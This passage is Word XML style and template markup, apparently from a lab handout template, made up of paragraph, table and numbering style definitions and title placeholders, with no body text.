    <w:name w:val="Body Text Bold"/>
    <w:basedOn w:val="1148"/>
    <w:next w:val="1170"/>
    <w:link w:val="1137"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1210">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1170"/>
    <w:link w:val="1138"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:contextualSpacing w:val="true"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1211" w:customStyle="1">
    <w:name w:val="CMD Red"/>
    <w:basedOn w:val="1168"/>
    <w:link w:val="1140"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="ee0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1212" w:customStyle="1">
    <w:name w:val="CMD Output Red"/>
    <w:basedOn w:val="1176"/>
    <w:link w:val="1143"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="ee0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1213">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1099"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="60" w:before="60"/>
      <w:ind w:firstLine="0" w:left="720"/>
      <w:contextualSpacing w:val="true"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1214">
    <w:name w:val="Revision"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl w:val="true"/>
      <w:pBdr/>
      <w:bidi w:val="false"/>
      <w:spacing w:after="0" w:before="0"/>
      <w:ind/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="1215" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="1216" w:customStyle="1">
    <w:name w:val="Bullet_List"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="1217" w:customStyle="1">
    <w:name w:val="Lab List"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="1218" w:customStyle="1">
    <w:name w:val="Section_List"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="1219" w:customStyle="1">
    <w:name w:val="Lab List1"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="1220"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Table Grid"/>
    <w:basedOn w:val="1220"/>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Light List - Accent 11"/>
    <w:basedOn w:val="1220"/>
    <w:uiPriority w:val="61"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:color="4f81bd" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="4f81bd" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="4f81bd" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="4f81bd" w:sz="8" w:space="0"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tcPr>
      <w:tcBorders/>
    </w:tcPr>
    <w:tblStylePr w:type="band1Horz">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band1Vert">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f81bd"/>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sz="6" w:space="0"/>
          <w:left w:val="single" w:color="4f81bd" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="4f81bd" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="4f81b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Lab_Table_Style"/>
    <w:basedOn w:val="1220"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:left w:w="115" w:type="dxa"/>
        <w:top w:w="14" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
        <w:bottom w:w="14"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cPr>
      <w:tcBorders/>
      <w:vAlign w:val="bottom"/>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val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:tblPr>
        <w:tblBorders/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="dbe5f1"/>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="2" w:space="0"/>
          <w:left w:val="single" w:color="000000" w:sz="2" w:space="0"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2" w:space="0"/>
          <w:right w:val="single" w:color="000000" w:sz="2"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Lab_Table_Style1"/>
    <w:basedOn w:val="1220"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:left w:w="115" w:type="dxa"/>
        <w:top w:w="14" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
        <w:bottom w:w="14"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cPr>
      <w:tcBorders/>
      <w:vAlign w:val="bottom"/>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val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:tblPr>
        <w:tblBorders/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="dbe5f1"/>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="2" w:space="0"/>
          <w:left w:val="single" w:color="000000" w:sz="2" w:space="0"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2" w:space="0"/>
          <w:right w:val="single" w:color="000000" w:sz="2"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hyperlink" Target="https://en.wikipedia.org/wiki/List_of_file_signatures" TargetMode="Externa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590D3D55688E48DDB6EC995446F5394E"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{2B73A043-C8E7-4F9A-9A7A-3BD769F434E4}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="1918"/>
            <w:pBdr/>
            <w:spacing/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="1917"/>
            </w:rPr>
            <w:t xml:space="preserve">[Title]</w:t>
          </w:r>
          <w:r/>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="49E5C2A683FF374D8B56395C3A481D78"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{988A1243-8652-9F4F-8BEA-5B6B5F2250A3}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="1919"/>
            <w:pBdr/>
            <w:spacing/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="1917"/>
            </w:rPr>
            <w:t xml:space="preserve">[Title]</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28">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="19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Table Grid Light"/>
    <w:basedOn w:val="19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Plain Table 1"/>
    <w:basedOn w:val="19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Plain Table 2"/>
    <w:basedOn w:val="19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Plain Table 3"/>
    <w:basedOn w:val="1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Plain Table 4"/>
    <w:basedOn w:val="1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Plain Table 5"/>
    <w:basedOn w:val="1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Grid Table 1 Light"/>
    <w:basedOn w:val="19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Grid Table 1 Light - Accent 1"/>
    <w:basedOn w:val="1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Grid Table 1 Light - Accent 2"/>
    <w:basedOn w:val="1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Grid Table 1 Light - Accent 3"/>
    <w:basedOn w:val="1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Grid Table 1 Light - Accent 4"/>
    <w:basedOn w:val="1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Grid Table 1 Light - Accent 5"/>
    <w:basedOn w:val="1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Grid Table 1 Light - Accent 6"/>
    <w:basedOn w:val="1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Grid Table 2"/>
    <w:basedOn w:val="1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Grid Table 2 - Accent 1"/>
    <w:basedOn w:val="1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Grid Table 2 - Accent 2"/>
    <w:basedOn w:val="1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Grid Table 2 - Accent 3"/>
    <w:basedOn w:val="1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Grid Table 2 - Accent 4"/>
    <w:basedOn w:val="1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Grid Table 2 - Accent 5"/>
    <w:basedOn w:val="1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Grid Table 2 - Accent 6"/>
    <w:basedOn w:val="1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Grid Table 3"/>
    <w:basedOn w:val="1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Grid Table 3 - Accent 1"/>
    <w:basedOn w:val="1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Grid Table 3 - Accent 2"/>
    <w:basedOn w:val="1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Grid Table 3 - Accent 3"/>
    <w:basedOn w:val="1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Grid Table 3 - Accent 4"/>
    <w:basedOn w:val="1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Grid Table 3 - Accent 5"/>
    <w:basedOn w:val="1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Grid Table 3 - Accent 6"/>
    <w:basedOn w:val="1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Grid Table 4"/>
    <w:basedOn w:val="19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Grid Table 4 - Accent 1"/>
    <w:basedOn w:val="19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Grid Table 4 - Accent 2"/>
    <w:basedOn w:val="19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Grid Table 4 - Accent 3"/>
    <w:basedOn w:val="19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Grid Table 4 - Accent 4"/>
    <w:basedOn w:val="19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Grid Table 4 - Accent 5"/>
    <w:basedOn w:val="19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Grid Table 4 - Accent 6"/>
    <w:basedOn w:val="19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Grid Table 5 Dark"/>
    <w:basedOn w:val="1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Grid Table 5 Dark- Accent 1"/>
    <w:basedOn w:val="1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name w:val="Grid Table 5 Dark - Accent 2"/>
    <w:basedOn w:val="1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Grid Table 5 Dark - Accent 3"/>
    <w:basedOn w:val="1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Grid Table 5 Dark- Accent 4"/>
    <w:basedOn w:val="1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Grid Table 5 Dark - Accent 5"/>
    <w:basedOn w:val="1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Grid Table 5 Dark - Accent 6"/>
    <w:basedOn w:val="1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Grid Table 6 Colorful"/>
    <w:basedOn w:val="19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71">
    <w:name w:val="Grid Table 6 Colorful - Accent 1"/>
    <w:basedOn w:val="19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72">
    <w:name w:val="Grid Table 6 Colorful - Accent 2"/>
    <w:basedOn w:val="1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73">
    <w:name w:val="Grid Table 6 Colorful - Accent 3"/>
    <w:basedOn w:val="19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74">
    <w:name w:val="Grid Table 6 Colorful - Accent 4"/>
    <w:basedOn w:val="1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75">
    <w:name w:val="Grid Table 6 Colorful - Accent 5"/>
    <w:basedOn w:val="19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76">
    <w:name w:val="Grid Table 6 Colorful - Accent 6"/>
    <w:basedOn w:val="19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77">
    <w:name w:val="Grid Table 7 Colorful"/>
    <w:basedOn w:val="19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Grid Table 7 Colorful - Accent 1"/>
    <w:basedOn w:val="19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Grid Table 7 Colorful - Accent 2"/>
    <w:basedOn w:val="19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Grid Table 7 Colorful - Accent 3"/>
    <w:basedOn w:val="19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Grid Table 7 Colorful - Accent 4"/>
    <w:basedOn w:val="19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Grid Table 7 Colorful - Accent 5"/>
    <w:basedOn w:val="19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Grid Table 7 Colorful - Accent 6"/>
    <w:basedOn w:val="19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List Table 1 Light"/>
    <w:basedOn w:val="1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List Table 1 Light - Accent 1"/>
    <w:basedOn w:val="1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List Table 1 Light - Accent 2"/>
    <w:basedOn w:val="1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List Table 1 Light - Accent 3"/>
    <w:basedOn w:val="1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List Table 1 Light - Accent 4"/>
    <w:basedOn w:val="1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List Table 1 Light - Accent 5"/>
    <w:basedOn w:val="1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List Table 1 Light - Accent 6"/>
    <w:basedOn w:val="1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List Table 2"/>
    <w:basedOn w:val="19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List Table 2 - Accent 1"/>
    <w:basedOn w:val="19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List Table 2 - Accent 2"/>
    <w:basedOn w:val="19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List Table 2 - Accent 3"/>
    <w:basedOn w:val="19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List Table 2 - Accent 4"/>
    <w:basedOn w:val="19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List Table 2 - Accent 5"/>
    <w:basedOn w:val="19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List Table 2 - Accent 6"/>
    <w:basedOn w:val="19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List Table 3"/>
    <w:basedOn w:val="1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List Table 3 - Accent 1"/>
    <w:basedOn w:val="19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List Table 3 - Accent 2"/>
    <w:basedOn w:val="1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List Table 3 - Accent 3"/>
    <w:basedOn w:val="19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List Table 3 - Accent 4"/>
    <w:basedOn w:val="1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List Table 3 - Accent 5"/>
    <w:basedOn w:val="19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List Table 3 - Accent 6"/>
    <w:basedOn w:val="19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List Table 4"/>
    <w:basedOn w:val="1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List Table 4 - Accent 1"/>
    <w:basedOn w:val="19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List Table 4 - Accent 2"/>
    <w:basedOn w:val="19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List Table 4 - Accent 3"/>
    <w:basedOn w:val="19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List Table 4 - Accent 4"/>
    <w:basedOn w:val="19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List Table 4 - Accent 5"/>
    <w:basedOn w:val="19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List Table 4 - Accent 6"/>
    <w:basedOn w:val="19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List Table 5 Dark"/>
    <w:basedOn w:val="19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3">
    <w:name w:val="List Table 5 Dark - Accent 1"/>
    <w:basedOn w:val="19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4">
    <w:name w:val="List Table 5 Dark - Accent 2"/>
    <w:basedOn w:val="19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5">
    <w:name w:val="List Table 5 Dark - Accent 3"/>
    <w:basedOn w:val="19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6">
    <w:name w:val="List Table 5 Dark - Accent 4"/>
    <w:basedOn w:val="19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7">
    <w:name w:val="List Table 5 Dark - Accent 5"/>
    <w:basedOn w:val="19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8">
    <w:name w:val="List Table 5 Dark - Accent 6"/>
    <w:basedOn w:val="19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9">
    <w:name w:val="List Table 6 Colorful"/>
    <w:basedOn w:val="19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List Table 6 Colorful - Accent 1"/>
    <w:basedOn w:val="19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List Table 6 Colorful - Accent 2"/>
    <w:basedOn w:val="19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List Table 6 Colorful - Accent 3"/>
    <w:basedOn w:val="19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name w:val="List Table 6 Colorful - Accent 4"/>
    <w:basedOn w:val="19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name w:val="List Table 6 Colorful - Accent 5"/>
    <w:basedOn w:val="19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name w:val="List Table 6 Colorful - Accent 6"/>
    <w:basedOn w:val="19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List Table 7 Colorful"/>
    <w:basedOn w:val="19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27">
    <w:name w:val="List Table 7 Colorful - Accent 1"/>
    <w:basedOn w:val="19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828">
    <w:name w:val="List Table 7 Colorful - Accent 2"/>
    <w:basedOn w:val="19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829">
    <w:name w:val="List Table 7 Colorful - Accent 3"/>
    <w:basedOn w:val="19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830">
    <w:name w:val="List Table 7 Colorful - Accent 4"/>
    <w:basedOn w:val="19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831">
    <w:name w:val="List Table 7 Colorful - Accent 5"/>
    <w:basedOn w:val="19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832">
    <w:name w:val="List Table 7 Colorful - Accent 6"/>
    <w:basedOn w:val="19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833">
    <w:name w:val="Lined - Accent"/>
    <w:basedOn w:val="1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Lined - Accent 1"/>
    <w:basedOn w:val="1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Lined - Accent 2"/>
    <w:basedOn w:val="1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Lined - Accent 3"/>
    <w:basedOn w:val="1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Lined - Accent 4"/>
    <w:basedOn w:val="1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Lined - Accent 5"/>
    <w:basedOn w:val="1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Lined - Accent 6"/>
    <w:basedOn w:val="1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Bordered &amp; Lined - Accent"/>
    <w:basedOn w:val="19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Bordered &amp; Lined - Accent 1"/>
    <w:basedOn w:val="19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Bordered &amp; Lined - Accent 2"/>
    <w:basedOn w:val="19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Bordered &amp; Lined - Accent 3"/>
    <w:basedOn w:val="19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Bordered &amp; Lined - Accent 4"/>
    <w:basedOn w:val="19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Bordered &amp; Lined - Accent 5"/>
    <w:basedOn w:val="19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Bordered &amp; Lined - Accent 6"/>
    <w:basedOn w:val="19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Bordered"/>
    <w:basedOn w:val="19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Bordered - Accent 1"/>
    <w:basedOn w:val="1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Bordered - Accent 2"/>
    <w:basedOn w:val="1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Bordered - Accent 3"/>
    <w:basedOn w:val="1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Bordered - Accent 4"/>
    <w:basedOn w:val="1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Bordered - Accent 5"/>
    <w:basedOn w:val="1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Bordered - Accent 6"/>
    <w:basedOn w:val="1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54">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="186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855">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="186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856">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="186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857">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="186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858">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="186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859">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="18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860">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="1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861">
    <w:name w:val="Heading 8"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="1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862">
    <w:name w:val="Heading 9"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="1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863">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1854"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1864">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1855"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1865">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1856"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1866">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1857"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1867">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1858"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1868">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1859"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1869">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1860"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1870">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1861"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1871">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1862"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1872">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="1873"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:contextualSpacing w:val="true"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:spacing w:val="-10"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1873">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1872"/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:spacing w:val="-10"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1874">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="1875"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1875">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1874"/>
    <w:uiPriority w:val="11"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1876">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="1877"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:before="160"/>
      <w:ind/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1877">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1876"/>
    <w:uiPriority w:val="29"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1878">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1913"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="true"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1879">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1880">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="1913"/>
    <w:next w:val="1913"/>
    <w:link w:val="188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81">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="1914"/>
    <w:link w:val="1880"/>
    <w:uiPriority w:val="30"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1882">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1883">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="1913"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1884">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1885">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="1914"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1886">
    <w:name w:val="Strong"/>
